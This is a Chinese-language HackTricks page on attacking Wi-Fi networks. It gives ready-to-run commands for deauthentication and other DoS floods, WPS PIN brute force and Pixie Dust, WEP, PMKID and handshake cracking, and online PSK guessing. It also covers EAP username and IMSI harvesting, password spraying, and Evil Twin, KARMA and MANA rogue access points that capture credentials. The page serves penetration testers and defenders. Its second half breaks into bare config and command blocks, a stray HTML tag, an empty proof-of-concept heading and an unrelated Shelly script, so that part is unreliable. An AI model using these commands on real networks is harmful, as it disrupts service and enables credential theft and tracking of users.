Pentesting 无线网络

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

无线网络 基本命令

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

工具

Hijacker & NexMon (Android 内部 Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

使用 docker 运行 airgeddon

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

来自: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

它可以执行 Evil Twin、KARMA 和 Known Beacons 攻击，然后使用 phishing 模板来获取网络的真实密码或捕获社交网络的 credentials。

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

此工具可自动化 WPS/WEP/WPA-PSK 攻击。它会自动：

• 将接口设置为 monitor mode
• 扫描可能的网络 - 并让你选择受害者(s)
• 如果 WEP - 启动 WEP 攻击
• 如果 WPA-PSK
• 如果 WPS: Pixie dust attack and the bruteforce attack (be careful the brute-force attack could take a long time). Notice that it doesn’t try null PIN or database/generated PINs.
• 尝试从 AP 捕获 PMKID 以进行破解
• 尝试对 AP 的客户端进行 deauthenticate 以捕获 handshake
• 如果 PMKID 或 Handshake，尝试使用 top5000 密码进行 bruteforce。

攻击摘要

• DoS
• Deauthentication/disassociation – 断开所有人（或特定 ESSID/Client）
• Random fake APs – 隐藏网络，可能使扫描器崩溃
• Overload AP – 试图使 AP 死机（通常不是很有用）
• WIDS – 与 IDS 互动
• TKIP, EAPOL – 针对某些 AP 的特定 DoS 攻击
• Cracking
• Crack WEP（多种工具和方法）
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – 可用于捕获 captive portal creds 和/或 执行 LAN 攻击
• WPA-PSK Evil Twin – 如果你知道密码，可用于网络攻击
• WPA-MGT – 可用于捕获公司凭证
• KARMA, MANA, Loud MANA, Known beacon
• + Open – 可用于捕获 captive portal creds 和/或 执行 LAN 攻击
• + WPA – 可用于捕获 WPA handshakes

Open / OWE networks quick notes

• Passive capture on open SSIDs still works with monitor mode and tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) 对每个站点执行单独的密钥交换（no PSK），因此即便在 “open” SSIDs 上，空中帧也会被加密。Being WPA3-based，它还强制启用 802.11w PMF，阻止伪造的 deauth/disassoc 帧。
• OWE 不对加入者进行认证：任何人都可以关联，所以要 verify client isolation，不要盲信厂商宣传。没有隔离时，本地 L2 上的 ARP spoofing 或 responder-style poisoning 仍然可行。
• Evil Twin 仍可在 open/OWE SSIDs 上通过提供更强的信号实现；PMF 只是去除了 deauth 这一捷径。如果受害者接受伪造的 TLS cert，则可恢复完整的 HTTP(S) MitM。
• 在 open guest Wi-Fi 上的广播投毒容易获得 creds/hashes（LLMNR/NBT-NS/mDNS）。See:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

描述来自 here:.

Deauthentication attacks，作为 Wi-Fi hacking 中一种常见的方法，涉及伪造 “management” 帧以 强制断开设备与网络的连接。这些未加密的数据包欺骗客户端，使其相信它们来自合法网络，从而使攻击者能够收集 WPA handshakes 以用于破解，或持续中断网络连接。该策略因其简单性而令人担忧，被广泛使用，对网络安全有重大影响。

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 表示 deauthentication
• 1 表示要发送的 deauths 数量（如果愿意可以发送多个）；0 表示持续发送
• -a 00:14:6C:7E:40:80 表示 access point 的 MAC address
• -c 00:0F:B5:34:30:30 表示要 deauthenticate 的 client 的 MAC address；如果省略则发送广播 deauthentication（并非总是有效）
• ath0 是 interface 的名称

Disassociation Packets

Disassociation packets, 类似于 deauthentication packets，是用于 Wi-Fi 网络的一种 management frame。这些 packets 用于切断设备（例如笔记本或智能手机）与 access point (AP) 之间的连接。disassociation 与 deauthentication 的主要区别在于它们的使用场景。当 AP 发出 deauthentication packets 来明确地将 rogue devices 从网络中移除，而 disassociation packets 通常在 AP 关机、重启或搬迁时发送，因此需要断开所有已连接的节点。

此攻击可以通过 mdk4(mode “d”) 执行：

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

更多 DOS 攻击，由 mdk4 发起

在 here.

ATTACK MODE b: Beacon Flooding

发送 beacon frames 以在客户端显示假冒 APs。有时这会使 network scanners 甚至 drivers 崩溃！

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

向所有在覆盖范围内可访问的 Access Points (APs) 发送 authentication frames 会使这些 APs 过载，尤其是在有大量 clients 时。如此强烈的流量可能导致系统不稳定，使部分 APs 冻结甚至重置。

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

对 Access Points (APs) 的 Probing 用于检查 SSID 是否被正确显示并确认 AP 的覆盖范围。该技术结合 bruteforcing hidden SSIDs（有或无 wordlist）可以帮助识别并访问隐藏的网络。

ATTACK MODE m: Michael Countermeasures Exploitation

向不同的 QoS 队列发送随机或重复的数据包可能会在 TKIP APs 上触发 Michael Countermeasures，导致 AP 暂停运行一分钟。该方法是高效的 DoS（Denial of Service）攻击手段。

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

攻击模式 e: EAPOL Start 和 Logoff Packet Injection

向 AP 洪泛大量 EAPOL Start frames 会创建 伪造会话，压垮 AP 并阻止合法客户端。或者，注入 fake EAPOL Logoff messages 强制断开客户端连接，这两种方法都能有效中断网络服务。

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: 针对 IEEE 802.11s 网状网络的攻击

针对网状网络中链路管理和路由的各种攻击。

ATTACK MODE w: WIDS 混淆

将客户端交叉连接到多个 WDS 节点或伪造的 rogue APs，可误导入侵检测与防御系统，造成混淆并可能导致系统滥用。

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer featuring diverse packet sources and a comprehensive set of modifiers for packet manipulation.

Airggedon

Airgeddon 提供了前述大多数提到的攻击：

WPS

WPS (Wi-Fi Protected Setup) 简化了将设备连接到路由器的过程，提高了对使用 WPA 或 WPA2 Personal 加密的网络的配置速度和便捷性。它对于易被攻破的 WEP 并不有效。WPS 使用一个 8 位数字的 PIN，分为两部分验证，因此由于组合数量有限（约 11,000 种可能），容易遭受 brute-force 攻击。

WPS Bruteforce

执行此操作主要有两种工具：Reaver 和 Bully。

• Reaver 被设计为针对 WPS 的一个稳健且实用的攻击工具，已在多种接入点和 WPS 实现上得到测试。
• Bully 是用 C 编写的 WPS brute force 攻击的 new implementation。与原始 reaver 代码相比，它有若干优点：依赖更少、内存和 CPU 性能更好、正确处理字节序（endianness），并且选项集更健全。

该攻击利用了 WPS PIN’s vulnerability，尤其是其暴露前四位数字且最后一位作为校验和的特性，从而简化了 brute-force 攻击。然而，针对 brute-force 的防御措施（例如 blocking MAC addresses 用于对付激进攻击者）要求进行 MAC address rotation 来继续攻击。

一旦使用 Bully 或 Reaver 等工具获取到 WPS PIN，攻击者即可推断出 WPA/WPA2 PSK，从而确保 persistent network access。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

这种改良的方法针对已知漏洞对 WPS PINs 进行攻击：

1. 预先发现的 PINs：利用一个包含已知 PINs 的数据库，这些 PINs 与某些厂商相关，这些厂商通常使用统一的 WPS PINs。该数据库将 MAC-addresses 的前三个八位字节与这些厂商可能使用的 PINs 关联起来。
2. PIN 生成算法：利用像 ComputePIN 和 EasyBox 这样的算法，它们根据 AP 的 MAC-address 计算 WPS PINs。Arcadyan 算法还需要一个 device ID，为 PIN 生成过程增加了一层复杂性。

WPS Pixie Dust attack

Dominique Bongard 发现了一些 Access Points (APs) 在生成称为 nonces (E-S1 和 E-S2) 的秘密码时存在缺陷。如果这些 nonces 能被推算出来，破解 AP 的 WPS PIN 就变得很容易。AP 会在一个特殊的码 (hash) 中暴露 PIN，以证明它是合法的，而不是伪造的 (rogue) AP。这些 nonces 本质上就是打开存放 WPS PIN 的“保险箱”的“钥匙”。更多信息见 这里.

简单来说，这个问题在于某些 APs 在连接过程中用于加密 PIN 的密钥随机性不足。这使得 PIN 易于从网络外被猜测（offline brute force attack）。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

如果你不想将设备切换到 monitor mode，或者 reaver 和 bully 出现问题，可以尝试 OneShot-C。该工具可以在不切换到 monitor mode 的情况下执行 Pixie Dust attack。

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

一些设计不良的系统甚至允许 Null PIN（一个空的或不存在的 PIN）授予访问权限，这相当不寻常。工具 Reaver 能够测试这种漏洞，而 Bully 则不能。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

所有提出的 WPS 攻击都可以使用 airgeddon. 轻松执行。

• 5 和 6 允许你尝试 你的自定义 PIN（如果有的话）
• 7 和 8 执行 Pixie Dust attack
• 13 允许你测试 NULL PIN
• 11 和 12 将 从可用数据库重新收集与所选 AP 相关的 PIN 并 生成 可能的 PINs，使用：ComputePIN、EasyBox，和可选的 Arcadyan（推荐，何乐而不为？）
• 9 和 10 将测试 所有可能的 PIN

WEP

为什么它会被攻破

• RC4 seed 只是 IV (24 bits) + shared key。IV 是明文，范围小（2^24），并且很快重复，所以使用相同 IV 的密文会重用 keystream。
• XORing 两个使用相同 keystream 的密文会 leaks PlaintextA ⊕ PlaintextB；可预测的报头 + RC4 KSA 偏差（FMS）让你“投票”出密钥字节。PTW 使用 ARP 流量对其进行优化，将所需数据包从百万级降至数万级。
• 完整性仅为 CRC32（线性/无密钥），因此攻击者可以翻转比特并在不需要密钥的情况下重新计算 CRC32 → packet forgery/replay/ARP injection，同时等待 IV。

实际破解是确定性的：

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon still ships an “All-in-One” WEP workflow if you prefer a guided UI。

WPA/WPA2 PSK

PMKID

In 2018, hashcat revealed a new attack method, unique because it only needs 一个数据包 and doesn’t require any clients to be connected to the target AP—just interaction between the attacker and the AP。

Many modern routers add an optional field to the first EAPOL frame during association, known as Robust Security Network. This includes the PMKID.

As the original post explains, the PMKID is created using known data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

鉴于“PMK Name”是恒定的，且我们知道 AP 和 station 的 BSSID，并且 PMK 与完整 4-way handshake 中的一致，hashcat 可以利用这些信息破解 PSK 并恢复 passphrase！

要收集这些信息并在本地bruteforce该密码，你可以做：

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs 已捕获 将显示在 console 中，并且也 已保存 在 _ /tmp/attack.pcap_
现在，将该捕获转换为 hashcat/john 格式并破解它：

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

请注意，正确的 hash 格式包含 4 个部分，例如：4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838。如果你的 仅 包含 3 个部分，那么它是 无效（PMKID capture wasn’t valid）。

注意 hcxdumptool also capture handshakes（会出现类似这样的输出：MP:M1M2 RC:63258 EAPOLTIME:17091）。你可以使用 cap2hccapx 将这些 handshakes 转换 为 hashcat/john 格式。

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

我注意到用这个工具捕获的某些 handshakes 即使知道正确的 password 也无法被 cracked。我建议在可能的情况下也通过传统方式捕获 handshakes，或者使用此工具多捕获几个。

Handshake capture

对 WPA/WPA2 网络的攻击可以通过捕获 handshake 并尝试 crack 密码 offline 来执行。该过程涉及在特定 channel 上监控特定网络与 BSSID 的通信。下面是简化的指南：

1. 识别目标网络的 BSSID、channel 和一个 connected client。
2. 使用 airodump-ng 在指定的 channel 和 BSSID 上监控网络流量，尝试捕获 handshake。命令如下：

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. 为了增加捕获 handshake 的机会，短暂断开客户端的网络连接以强制重新认证。可以使用 aireplay-ng 命令来完成此操作，该命令向客户端发送 deauthentication 数据包：

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that as the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network.

一旦在 airodump-ng 中出现了 handshake 信息，这表示 handshake 已被捕获，你可以停止监听：

一旦 handshake 被捕获，你可以使用 aircrack-ng crack 它：

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

检查文件中是否存在 handshake

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

如果该工具在已完成的 handshake 之前先发现某个 ESSID 的未完成 handshake，它将不会检测到有效的那个。

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

通过 wpa_supplicant ctrl socket 更快速地在线猜测 PSK（无客户端/PMKID）

当没有客户端在场且 AP 拒绝 PMKID 时，你可以在不重新启动 supplicants 的情况下在线迭代 PSKs：

• 修改 wpa_supplicant.c，在认证失败的退避逻辑（靠近 ssid->auth_failures）中强制设置 dur = 0;，从而有效地禁用临时禁用计时器。
• 以带有 control socket 的单个 daemon 运行：

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• 通过控制界面驱动它，复用相同的 scan 和 network:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

一个小的 Python 循环读取 socket 事件（CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED）可以在没有扫描开销的情况下在约 5 分钟内测试 ~100 个猜测。它仍然会产生噪声并可能被检测到，但避免了每次尝试重启进程和回退延迟。

WPA Enterprise (MGT)

在 enterprise WiFi 部署中，你会遇到多种认证方法，每种提供不同的安全级别和管理功能。当你使用像 airodump-ng 这样的工具检查网络流量时，可能会看到这些认证类型的标识。一些常见的方法包括：

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• 这种方法在 EAP-PEAP 中支持硬件令牌和一次性密码。与 MSCHAPv2 不同，它不使用对等挑战，并将密码以明文发送到接入点，从而存在降级攻击的风险。

2. EAP-MD5 (Message Digest 5):

• 涉及客户端发送密码的 MD5 散列。由于易受字典攻击、缺乏服务器认证以及无法生成基于会话的 WEP 密钥，不推荐使用。

3. EAP-TLS (Transport Layer Security):

• 使用客户端和服务器端证书进行认证，并可以动态生成基于用户和基于会话的 WEP 密钥以保护通信。

4. EAP-TTLS (Tunneled Transport Layer Security):

• 通过加密隧道提供双方认证，并提供一种派生动态的、按用户和按会话的 WEP 密钥的方法。它只需要服务器端证书，客户端使用凭据。

5. PEAP (Protected Extensible Authentication Protocol):

• 通过创建 TLS 隧道实现受保护的通信，功能类似于 EAP。由于隧道提供的保护，它允许在 EAP 之上使用较弱的认证协议。
• PEAP-MSCHAPv2: 通常称为 PEAP，它将易受攻击的 MSCHAPv2 挑战/响应机制与保护性的 TLS 隧道结合在一起。
• PEAP-EAP-TLS (or PEAP-TLS): 与 EAP-TLS 类似，但在交换证书之前先建立 TLS 隧道，提供额外的安全层。

You can find more information about these authentication methods here and here.

Username Capture

阅读 https://tools.ietf.org/html/rfc3748#page-27 后，看来如果使用 EAP，“Identity” 消息必须被支持，并且 用户名 会以 明文 出现在 “Response Identity” 消息中。

即便使用最安全的认证方法之一：PEAP-EAP-TLS，仍然可能 捕获 EAP 协议中发送的用户名。为此，捕获一次认证通信（在某个信道内启动 airodump-ng，并在同一接口上运行 wireshark）并按 eapol 过滤数据包。
在 “Response, Identity” 数据包内，客户端的 用户名 将会出现。

Anonymous Identities

Identity hiding 由 EAP-PEAP 和 EAP-TTLS 都支持。在 WiFi 网络的上下文中，EAP-Identity 请求通常由接入点 (AP) 在关联过程中发起。为保护用户匿名性，用户设备上的 EAP 客户端的响应只包含初始 RADIUS 服务器处理该请求所需的必要信息。该概念通过以下场景说明：

• EAP-Identity = anonymous
• 在这种情况下，所有用户都使用化名 “anonymous” 作为其用户标识。初始 RADIUS 服务器作为 EAP-PEAP 或 EAP-TTLS 服务器，负责管理 PEAP 或 TTLS 协议的服务器端。内部（受保护的）认证方法随后要么在本地处理，要么委托给远程 (home) RADIUS 服务器。
• EAP-Identity = anonymous@realm_x
• 在这种情况下，不同 realm 的用户隐藏了自己的真实身份，同时表明了各自的 realm。这允许初始 RADIUS 服务器将 EAP-PEAP 或 EAP-TTLS 请求代理到其 home realm 中的 RADIUS 服务器，这些服务器充当 PEAP 或 TTLS 服务器。初始 RADIUS 服务器仅作为 RADIUS 中继节点运行。
• 或者，初始 RADIUS 服务器也可以作为 EAP-PEAP 或 EAP-TTLS 服务器运行，并要么处理受保护的认证方法，要么将其转发到另一个服务器。此选项便于为不同的 realm 配置不同的策略。

在 EAP-PEAP 中，一旦在 PEAP 服务器和 PEAP 客户端之间建立了 TLS 隧道，PEAP 服务器将发起一个 EAP-Identity 请求并将其通过 TLS 隧道传输。客户端对这个第二个 EAP-Identity 请求的响应会通过加密隧道发送包含用户真实身份的 EAP-Identity 响应。这种方法有效地防止了任何监听 802.11 流量的人获知用户的真实身份。

EAP-TTLS 的流程略有不同。使用 EAP-TTLS 时，客户端通常使用 PAP 或 CHAP 进行认证，并由 TLS 隧道保护。在这种情况下，客户端在隧道建立后发送的初始 TLS 消息中包含 User-Name 属性以及 Password 或 CHAP-Password 属性之一。

无论选择哪种协议，PEAP/TTLS 服务器在建立 TLS 隧道后都会获知用户的真实身份。真实身份可以表示为 user@realm 或仅为 user。如果 PEAP/TTLS 服务器也负责对用户进行认证，它现在拥有用户的身份并继续使用由 TLS 隧道保护的认证方法。或者，PEAP/TTLS 服务器可以将一个新的 RADIUS 请求转发到用户的 home RADIUS 服务器。这个新的 RADIUS 请求省略了 PEAP 或 TTLS 协议层。如果受保护的认证方法是 EAP，则内部 EAP 消息会在没有 EAP-PEAP 或 EAP-TTLS 包装的情况下传输到 home RADIUS 服务器。传出的 RADIUS 消息的 User-Name 属性包含用户的真实身份，替换了传入 RADIUS 请求中的匿名 User-Name。当受保护的认证方法是 PAP 或 CHAP（仅由 TTLS 支持）时，从 TLS 有效载荷中提取的 User-Name 及其他认证属性会被替换到传出的 RADIUS 消息中，取代传入 RADIUS 请求中的匿名 User-Name 和 TTLS EAP-Message 属性。

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

使用 EAP‑SIM/EAP‑AKA 在 802.1X 上进行基于 SIM 的 Wi‑Fi 认证时，如果部署未实现伪名/受保护身份或在内部 EAP 周围没有 TLS 隧道，可能会在未认证的身份阶段以明文泄露永久用户标识符 (IMSI)。

泄露发生的位置（高层）:

• 802.11 完成与 SSID 的关联（通常是运营商卸载 SSID，如 FreeWifi_secure、类似 eduroam 的运营商 realm 等）。
• Authenticator 发送 EAP-Request/Identity。
• 易受影响的客户端会在任何保护之前以其永久身份（即以 3GPP NAI 编码的 IMSI）响应 EAP-Response/Identity。
• 示例 NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• 任何被动监听 RF 的人都可以读取该帧。无需 4-way handshake 或 TLS 密钥协商。

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

注意：
- Works before any TLS tunnel if the deployment uses bare EAP‑SIM/AKA without protected identity/pseudonyms.
- The exposed value is a permanent identifier tied to the subscriber’s SIM; harvesting enables long‑term tracking and downstream telecom abuses.

影响
- 隐私：在公共场所通过被动 Wi‑Fi 抓包实现对用户/设备的持久追踪。
- 电信滥用引导：有了 IMSI，拥有 SS7/Diameter 访问权限的攻击者可以查询位置信息或尝试拦截通话/SMS 并窃取 MFA。

缓解措施 / 检查要点
- 验证客户端是否按 3GPP 指导使用匿名外部身份（化名）用于 EAP‑SIM/AKA（例如 3GPP TS 33.402）。
- 优先将身份阶段进行隧道传输（例如 EAP‑TTLS/PEAP 携带内部 EAP‑SIM/AKA），以确保 IMSI 不以明文发送。
- 关联/认证的抓包不应在 EAP-Response/Identity 中暴露原始 IMSI。

Related: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Shelly.addEventHandler(function (event) {
if (event.component === "switch:0" && event.info.state) {
Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
}
});